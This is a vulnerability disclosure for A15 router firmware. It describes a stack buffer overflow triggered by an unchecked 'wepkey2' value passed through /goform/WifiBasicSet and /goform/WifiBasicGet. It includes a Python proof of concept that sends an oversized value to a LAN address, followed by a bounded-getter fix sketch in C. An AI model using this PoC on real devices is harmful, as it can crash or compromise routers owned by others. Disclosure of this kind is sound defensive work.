We found a stack buffer overflow vulnerability in the **A15** (firmware version V15.13.07.13).

In the handler function for action /goform/WifiBasicSet, the user-controlled string “wepkey2” is stored into “wl2g.extra.wep_key2” via SetValue.

The handler for /goform/WifiBasicGet then loads the string from “wl2g.extra.wep_key2” and copies it into the stack buffer wifi_buf_entry. Because the length of “wepkey2” is never checked, a large string overflows the stack buffer.

POC

```python
import requests

# Cookie sent with both requests
cookie = {"Cookie": "uid=1234"}

# Step 1: store an oversized "wepkey2" value via WifiBasicSet
url1 = "http://192.168.17.221:80/goform/WifiBasicSet"
data1 = {"wepkey2": "a" * 0x1000,
         "security": "wep"}
response = requests.post(url1, cookies=cookie, data=data1)

# Step 2: WifiBasicGet loads the stored value into the stack buffer
url2 = "http://192.168.17.221:80/goform/WifiBasicGet"
data2 = {}
response = requests.post(url2, cookies=cookie, data=data2)
print(response.text)
print(response)
```

Fix Suggestion

The GetValue function should accept a length argument so that it cannot write past the end of the destination buffer.
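
A sketch of what a length-aware getter could look like, added here as an example and not taken from the firmware. The names `get_value_bounded`, `store_set` and `read_wep_key2`, the in-memory store, and the 64-byte size of `wifi_buf_entry` are assumptions; the firmware's real GetValue signature and buffer size are not shown above.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the firmware's config store: one key/value pair. */
static char store_key[64];
static char store_val[0x1100];

/* Hypothetical setter, used only to populate the sample store. */
static void store_set(const char *key, const char *val) {
    size_t kl = strlen(key), vl = strlen(val);
    if (kl >= sizeof store_key || vl >= sizeof store_val) return;
    memcpy(store_key, key, kl + 1);
    memcpy(store_val, val, vl + 1);
}

/* Hypothetical bounded getter: the caller passes the destination size.
   Returns 0 on success, -1 if the key is missing or arguments are invalid,
   -2 if the stored value does not fit (out is left as an empty string). */
int get_value_bounded(const char *key, char *out, size_t out_len) {
    if (key == NULL || out == NULL || out_len == 0)
        return -1;
    out[0] = '\0';
    if (strcmp(key, store_key) != 0)
        return -1;
    size_t need = strlen(store_val) + 1;   /* include the terminator */
    if (need > out_len)
        return -2;                         /* reject instead of truncating */
    memcpy(out, store_val, need);
    return 0;
}

/* Mirrors the read path: a fixed-size buffer filled from the store. */
int read_wep_key2(char *dst, size_t dst_len) {
    return get_value_bounded("wl2g.extra.wep_key2", dst, dst_len);
}

int main(void) {
    char wifi_buf_entry[64];               /* size is an assumption */
    char big[0x1001];
    memset(big, 'a', sizeof big - 1);      /* same length as the PoC value */
    big[sizeof big - 1] = '\0';
    store_set("wl2g.extra.wep_key2", big);
    printf("oversized: %d\n", read_wep_key2(wifi_buf_entry, sizeof wifi_buf_entry));
    store_set("wl2g.extra.wep_key2", "abcde");
    printf("valid: %d\n", read_wep_key2(wifi_buf_entry, sizeof wifi_buf_entry));
    return 0;
}
```

Rejecting an oversized value instead of truncating it keeps a partial key from being returned to the caller as if it were valid.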